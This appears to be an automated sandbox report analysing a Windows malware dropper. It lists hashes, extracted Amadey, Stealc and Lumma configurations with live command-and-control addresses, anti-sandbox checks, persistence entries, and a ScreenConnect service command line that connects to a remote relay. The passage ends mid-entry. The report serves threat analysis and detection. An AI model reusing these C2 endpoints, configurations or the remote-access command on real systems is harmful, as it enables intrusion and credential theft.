Analysis
-
max time kernel
142s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
20/02/2025, 12:57
Static task
static1
Behavioral task
behavioral1
Sample
2b61614ceb74a081d8a0683f353fdec509e976cdd3004c10f8c977c6ce17c470.exe
Resource
win10v2004-20250217-en
General
-
Target
2b61614ceb74a081d8a0683f353fdec509e976cdd3004c10f8c977c6ce17c470.exe
-
Size
5.5MB
-
MD5
d0a8f8009be5fca50f51f921172f1c09
-
SHA1
fb248ffa5b3016254ac0f42412fe68e1d38761ef
-
SHA256
2b61614ceb74a081d8a0683f353fdec509e976cdd3004c10f8c977c6ce17c470
-
SHA512
d3e56567fb53f487ffbe7e79794e09b61f688a35cfeadf1f58a1039cc54aa3a6c2637be7deb0e6a86c66e59d49ac034f01d55d1911054613b11d625d58687fb9
-
SSDEEP
98304:rvdN5/3I03K4/mEAynzEaWnHY1QSFFO9w9u7AYqTdp8FxFvf8lS1IenvCN9ySf3w:xN5/Y03j/mEAd3Y1QSFFOp770P8F7f8D
Malware Config
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
stealc
reno
http://185.215.113.115
-
url_path
/c4becf79229cb002.php
Extracted
lumma
https://penetratebatt.pw/api
Signatures
-
Amadey family
-
Lumma family
-
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2O4054.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3Z15F.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ MAl7pjE.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1n70A2.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe -
Downloads MZ/PE file 3 IoCs
flow pid Process 8 2252 skotes.exe 8 2252 skotes.exe 8 2252 skotes.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (91b7d375130f294a)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (91b7d375130f294a)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=fv-dev.innocreed.com&p=8041&s=71208079-e773-47a5-9d56-241df27f2d02&k=BgIAAACkAABSU0ExAAgAAAEAAQD5wtPOV3jCKFBLBsJ%2bV2IvGNdB3BTw3%2f7f3qmPmpEeYSXd1jGOatzoch6LU%2fh7cgGu%2bCj4f65wOx8AqDxICfj1AlxsHvMXD0ReOH62PLLSTPTukKm5RrhhJDxk4MmWP%2byBb46HAlkpjuwiGPts8qrBKMb47tVBoGNwLhbutjkbQNksjhMQH1AWAWUktJQ85d0L163Ahixe3xI7cGngG1%2baQm5IzZ3UPJpZ%2b9SN8gb89xLov6PdHVlnj%2bxe1Qvlapboi4ODTYPekRoAhHcR2A9cyIErFTA4j5R4TWoF8f3ZRb6IRobccYev2f%2b8vM98GtEnWHEzuZHxGcRJ5afFuG3P&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAA04YYX53CS0aBKnztgEmzcgAAAAACAAAAAAAQZgAAAAEAACAAAACI8yvY3JIVz%2fWB7VuHo0x6X%2fE4MB8GzJ%2bb7QJ%2fhCq4SAAAAAAOgAAAAAIAACAAAAA8YAJjjJemmIn1sMNaFX6yTjAIM3r3ge7XgEp40NJUAaAEAADE6zAY5CJaZOsUi9YSwa5kgDSkGpY1NPVyHiFVc%2f%2fGTv%2fyLfLAuQ6mGq%2fCO3CaaNIgBUd1GtEkrBppl%2bSa3V2gjjxyWHVpLXC0hYmbwgNqIVXaTIhQfoC3SYGwOvJEl1EHkVvX97TVm%2bsyxA1NbF0GJb8PJgKvy7x4kWYvoY%2fRjrstqJtKeDQQsCKr0lMiwlVFX9LbN%2fREMseCUC1baxafBqG8KPNPr5PS2ejIQF5TUnXtwyInRNDjnXOt2JWFyGkHH8Ig4yxaU%2bRaLREghrQ68Cm2ddYGP67iItJB14PIJ0XfM6k1AgBp53kbJrIp6gjJkQ1JJkk6kQ7JhI2vukgpeH1GuLyv4zzK3fsEkCK%2f94d7DhlSlu0drn%2fLt3YcB5FUSBF7gLRvtTNVfLDKpXZzqJAJCXOKjTuTyWkA8tmJ8NUo60kQDqtv8T%2bbA%2b8yMZnH2fV1edMUVhvqXBJ1dYfv0AzAxtqTBolpDJ4N9Q0a3gfP7hthml1fWbALTeT6CdH4aF6sxrLITZJ8C2yAqdv3LUNLgYk%2fWrYq1Aq%2fchZqkFmP%2b93lq7uu9yLrWXs9tL8%2f68wmo%2fNELyJhJlbReUo2a9QWI5ZX318h0So8nvo5IcMcyQ5kvaMGFcbpQhcDnPZwN4P1PCUnSvFo0owsI%2by3ExuEpSuHvlhdVHSyI0AuPsxXbn3z4G1SFrEkEMYiWQZ8I5IdjcXe3hzA7uVFVnKjS1fLjePa41r2ZDSikgYkRLRTghi5lly2jJDfN5ezslOFjQ3mNBEsfR25lcArH7jUt5D8dIioYfRl%2fBeLOEVTNmUaAiYaF5oiBgrTzSX7tPcP03%2bappxlH10GTfqUkahgNzqjOxLvzQJSykTR39HvdXpBL8qAAUujEnG%2b6Ybt32Lq6SlTeOar2ybs%2bkJVKqFbcsBjbRlGmgVUOXeQBhxHFbzDW0OLnPglJPXgPUyJgeQ7QJ8mpFvF7FyF8snHc%2fOEIS3baQw%2byHGAa%2fB5ogKgT7WQmB3mBfJRFRqsmJ%2fHi5Gh2xVe15%2f4KLAP%2f0xXa8iMpMVeJnm6uHPYh6OgVCjOq5Isb2Xna5LX09V3kSrh7T9exXmnP17p89qcHqBYI8Zdlnmr%2fYDqIh0OzVHio6nrkfMpV9PaskZaUfXm8XTaB%2fHtjpAxjQlnuo9GwcUaY12f8FAbmqXW6oC7fqER1mbHfBW2CmNYId3JSl1U9sFDEE6hOK0GW868FpnnrmCSGCAT7J2TsWIrEzbuHyCFxRuAJBvrvxho%2b0VK1vaO%2bOsTdby37zMiM2Gs4yj7fM4uXDm9%2bXva7I5IxNMiYeIACZKKkSDOxsP2X8tHnyPI%2f6gwrXaP%2fSMDMrBRHcOfsm3hao0O%2bNcZCaRMaHejAm22rqu6DmiyWKGk1A2q4WLZ1e2glm3Ko4VemN4La7K%2foiNrxPTKnjWlwyKuM1h2x%2b%2bzwWFO7Lh1TBXgKJ%2f2pS8Gw7u0OAZurONndAiuNqcejbwtws4GVq0AAVxIIP9dU5oV7uL6uJec59676XTsQD7JWQIcZRW6CVE3ZzWmACmAYbDPGSLNd0aNCvvS74mzBhRBNntgR0AAAACvb9BLC4VdAsPeN1v8Hd3psomtkNOec9N7iYZRS%2fNUrayFNKGUWg2xXIUvZjkehOXa7KoPB7PdOsAhvSKcRlmE&c=prequest&c=&c=&c=&c=&c=&c=&c=\"" ScreenConnect.ClientService.exe -
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3Z15F.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3Z15F.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion MAl7pjE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1n70A2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2O4054.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2O4054.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion MAl7pjE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1n70A2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation sQ3DZPU.exe Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation a1EoH8b.exe Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation 1n70A2.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 15 IoCs
pid Process 3052 b1X18.exe 3872 1n70A2.exe 2252 skotes.exe 5020 2O4054.exe 1584 sQ3DZPU.exe 2220 3Z15F.exe 528 apisysDirectx.exe 2556 skotes.exe 2700 a1EoH8b.exe 4904 MAl7pjE.exe 2404 ScreenConnect.ClientService.exe 2580 ScreenConnect.WindowsClient.exe 4952 ScreenConnect.WindowsClient.exe 2684 apisysDirectx.exe 3820 skotes.exe -
Identifies Wine through registry keys 2 TTPs 7 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine 1n70A2.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine 2O4054.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine 3Z15F.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine MAl7pjE.exe -
Loads dropped DLL 22 IoCs
pid Process 4112 MsiExec.exe 4808 rundll32.exe 4808 rundll32.exe 4808 rundll32.exe 4808 rundll32.exe 4808 rundll32.exe 4808 rundll32.exe 4808 rundll32.exe 4808 rundll32.exe 4808 rundll32.exe 556 MsiExec.exe 2188 MsiExec.exe 2404 ScreenConnect.ClientService.exe 2404 ScreenConnect.ClientService.exe 2404 ScreenConnect.ClientService.exe 2404 ScreenConnect.ClientService.exe 2404 ScreenConnect.ClientService.exe 2404 ScreenConnect.ClientService.exe 2404 ScreenConnect.ClientService.exe 2404 ScreenConnect.ClientService.exe 2404 ScreenConnect.ClientService.exe 2404 ScreenConnect.ClientService.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 2b61614ceb74a081d8a0683f353fdec509e976cdd3004c10f8c977c6ce17c470.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" b1X18.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\J: msiexec.exe -
Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs
Suspicious Windows Authentication Registry Modification.
description ioc Process Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800390031006200370064003300370035003100330030006600320039003400610029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 msiexec.exe -
Drops file in System32 directory 3 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (91b7d375130f294a)\z0ybapci.tmp ScreenConnect.ClientService.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (91b7d375130f294a)\z0ybapci.newcfg ScreenConnect.ClientService.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log ScreenConnect.WindowsClient.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
pid Process 3872 1n70A2.exe 2252 skotes.exe 5020 2O4054.exe 2220 3Z15F.exe 2556 skotes.exe 4904 MAl7pjE.exe 3820 skotes.exe -
Drops file in Program Files directory 17 IoCs
description ioc Process File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsFileManager.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.ClientService.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsClient.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\Client.en-US.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.Windows.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsAuthenticationPackage.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\system.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.Core.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsBackstageShell.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsBackstageShell.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsFileManager.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\Client.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\app.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.Client.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.ClientService.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsClient.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsCredentialProvider.dll msiexec.exe -
Drops file in Windows directory 14 IoCs
description ioc Process File created C:\Windows\Installer\e593416.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI354F.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI357E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI3745.tmp msiexec.exe File opened for modification C:\Windows\Installer\{E7FFB52F-03E7-9BA2-D37A-094243CEF563}\DefaultIcon msiexec.exe File created C:\Windows\Tasks\skotes.job 1n70A2.exe File opened for modification C:\Windows\Installer\e593416.msi msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\SourceHash{E7FFB52F-03E7-9BA2-D37A-094243CEF563} msiexec.exe File created C:\Windows\Installer\wix{E7FFB52F-03E7-9BA2-D37A-094243CEF563}.SchedServiceConfig.rmi MsiExec.exe File created C:\Windows\Installer\e593418.msi msiexec.exe File created C:\Windows\Installer\{E7FFB52F-03E7-9BA2-D37A-094243CEF563}\DefaultIcon msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 18 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MAl7pjE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2O4054.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sQ3DZPU.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language apisysDirectx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language apisysDirectx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1n70A2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3Z15F.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a1EoH8b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ScreenConnect.ClientService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2b61614ceb74a081d8a0683f353fdec509e976cdd3004c10f8c977c6ce17c470.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b1X18.exe -
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000924b2722e829c64b0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000924b27220000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900924b2722000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d924b2722000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000924b272200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ScreenConnect.WindowsClient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ScreenConnect.WindowsClient.exe -
Modifies data under HKEY_USERS 13 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.ClientService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.ClientService.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 msiexec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.WindowsClient.exe -
Modifies registry class 37 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-91b7d375130f294a\UseOriginalUrlEncoding = "1" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-91b7d375130f294a msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-91b7d375130f294a\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (91b7d375130f294a)\\ScreenConnect.WindowsClient.exe\" \"%1\"" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\PackageCode = "F25BFF7E7E302AB93DA7902434EC5F36" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\AuthorizedLUAApp = "0" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\SourceList msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\SourceList\PackageName = "ScreenConnect.ClientSetup.msi" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\SourceList\Media\1 = ";" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-677C-F9795D14B5AB}\InprocServer32 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\ProductName = "ScreenConnect Client (91b7d375130f294a)" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\sc-91b7d375130f294a\shell\open\command msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-91b7d375130f294a\shell\open msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\SourceList\Media msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-91b7d375130f294a\URL Protocol msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-91b7d375130f294a\shell msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-91b7d375130f294a\shell\open\command msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-677C-F9795D14B5AB} msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\F25BFF7E7E302AB93DA7902434EC5F36 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36 msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\Language = "1033" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\AdvertiseFlags = "388" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-677C-F9795D14B5AB}\InprocServer32\ThreadingModel = "Apartment" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\ProductIcon = "C:\\Windows\\Installer\\{E7FFB52F-03E7-9BA2-D37A-094243CEF563}\\DefaultIcon" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\DeploymentFlags = "3" msiexec.exe Set value (str) 